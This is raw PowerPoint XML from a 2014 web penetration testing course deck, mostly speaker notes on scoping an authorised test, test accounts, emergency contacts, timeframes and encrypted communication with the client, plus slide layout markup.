            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that we need to include both testing team personnel and the target organization's staff.  If this is a test that targets a third-party vendor in part or whole, make sure they are involved.  One group that should be brought in and isn't many times are the developers.  By including them in a penetration test we can accomplish two different actions.  First we encourage them to understand security better and they are prepared to share information if needed during the testing.</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94</a:t>
            </a:fld>
            <a:endParaRPr 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Before a test can begin, you must understand and agree on a type of test and its scope.  I have been involved with tests, especially internal ones, where the two sides had different ideas of scope.  If the application owner thinks you will be testing each and every application you find, and you have scoped two weeks to test the single sign-on functionality, someone is going to be real unhappy.  Either the application owner because not everything was done, or you because you ended up doing a lot more work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is also important to understand the goals of the person or group requesting the test.  They may want you to test for every single type of vulnerability and hole within the entire application suite, or they may only want to know if their administration section is secure.  By understanding what the requestor is expecting, you can focus your efforts to accomplish their goals.  Of course, if their goal is for you to say "everything is perfect" and you realize that the application has no authentication or input filtering whatsoever, you probably aren</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t going to be able to meet their goals. ;)</a:t>
            </a:r>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95</a:t>
            </a:fld>
            <a:endParaRPr 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xfrm>
            <a:off x="765175" y="4560888"/>
            <a:ext cx="5791200" cy="4319587"/>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One of the things I see being the most difficult for testers is not having enough information to perform a test.  It is quite common for people to give a URL to a test team and then expect them to accomplish miracles!  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>One of the first pieces needed is which applications are in scope.  For example, if you are testing an application behind a single sign on (SSO) system, does the application owner want the SSO tested or just the application behind it.  You will also need to get user ids to perform any testing of authenticated applications.  Typically I get at least two ids for each authorization level and I also test the registration of ids.  The reason you need two different ids for each level is to test horizontal attacks as well as vertical.  We will get into this more as the class progresses.  The restrictions refer to any technology restrictions the application places on the user.  For example, if the application only gets used by people with IE and the application owner can control that, it affects the test.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The last piece of information required is the emergency contacts.  You need to have communication paths into the target organization in case something goes wrong.  And they need to know how to reach you.  Even with the best testers and efforts, systems crash.  Be ready for it!</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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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The testing section will be covered in depth farther in the course, but we want to make sure to cover a few key points regarding Rules of Engagement to follow throughout the test process.  One, make sure the target knows where your attacks are coming from.  The worst thing to have happen is to have a real attacker targeting the application at the same time as your test, and the target assumes it's you and ignores it.  Another part of that is to identify your timeframes.  I have worked with companies that gave us free reign as to when we would test, others have requested that we only test after hours or during business hours for various reasons.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The last thing is to communicate.  Make sure that your communication paths are known and verified.  You don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t want to crash the target's main web application and then realize that you don't know who to call and tell.  Or worse, when you call the contact you were given, they have no idea who you are and why you are calling.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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5" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289796"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During the test, various identifiers will be used.  The attack traffic will be source from specific IP addresses or address ranges. The attackers will be sourcing e-mails and receiving e-mails from specific e-mail addresses.  They will also typically be using test accounts and information, such as credit card numbers, etc.  These pieces of information need to be given to the target.  This will enable them to determine if something is coming from the test or other attackers.</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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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9" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290820"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Before beginning the test, the client and the testers will need to work out various time frames.  These would include the length of time for the actual test, the windows in which the test can be performed and how long until the client will get the report. You should also arrange for time frames on various deliverables, such as data points needed for the test and response times from the client if the testers need information or assistance.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{CE86D591-EB46-49C9-B58B-417466F1609D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>99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3DB655-50C4-45E6-A578-CAA3EE3C9AF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728778"/>
            <a:ext cx="9144000" cy="5144786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1905000"/>
            <a:ext cx="7772400" cy="1447800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36147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dirty="0"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="-61608" y="6406961"/>
            <a:ext cx="685800" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{20B8B63F-B559-4CC7-A844-A7B51D6F17D1}" type="slidenum">
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFCC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCC00"/>
              </a:solidFill>
              <a:latin typeface="Arial"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075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1578684"/>
            <a:ext cx="8686800" cy="4724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dirty="0"/>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19053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4D9F24-0869-4634-B169-903289646E1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891" y="1720996"/>
            <a:ext cx="9144000" cy="5144786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="219075" y="152401"/>
            <a:ext cx="8734425" cy="114299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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="1524000"/>
            <a:ext cx="86868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Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="113489" y="6400799"/>
            <a:ext cx="685800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{20B8B63F-B559-4CC7-A844-A7B51D6F17D1}" type="slidenum">
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFCC00"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFCC00"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147483936" r:id="rId1"/>
    <p:sldLayoutId id="2147483926" r:id="rId2"/>
    <p:sldLayoutId id="2147483928" r:id="rId3"/>
    <p:sldLayoutId id="2147483937" r:id="rId4"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="40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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4400">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">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15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject4.bin"/><Relationship Id="rId12"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image" Target="../media/image4.wmf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject7.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject2.bin"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject6.bin"/></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oleObject" Target="../embeddings/oleObject10.bin"/></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wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject11.bin"/></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133.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oleObject" Target="../embeddings/oleObject12.bin"/></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oleObject" Target="../embeddings/oleObject13.bin"/></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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.w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685800" y="1981200"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web Penetration Testing and Ethical Hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>s View of the Web</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10243" name="TextBox 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3623494"/>
            <a:ext cx="9144000" cy="16435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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Professionally Evil </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web Application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Penetration Testing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>101.1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10244" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5489781"/>
            <a:ext cx="9144000" cy="566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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Copyright 2014, Secure Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Version 1Q14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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Understanding the Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1630680"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>To conduct successful web application penetration tests, we need a deeper understanding of web technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pen testers have a different viewpoint from normal users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Must think maliciously, but act professionally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>How can I bypass restrictions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>What mistakes did the developers, admins, and operators of the target system make?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is often a different mindset from the developers and admins themselves!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Focus on bypassing application controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Find business logic problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>It is one of the focuses for today</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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Communications Planning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120835" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350520" y="1600200"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Establish communication methods and contacts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Various communication contacts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Technical Contacts for target system personnel and testers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Management Contacts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Acceptable methods could include</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>E-mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Phone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Instant Message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Protections should always be used, because sensitive information regarding application vulnerabilities may be discussed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>PGP/GnuPG for e-mail or file being transferred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IM should use encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Off-the-Record (OTR) is an option</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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
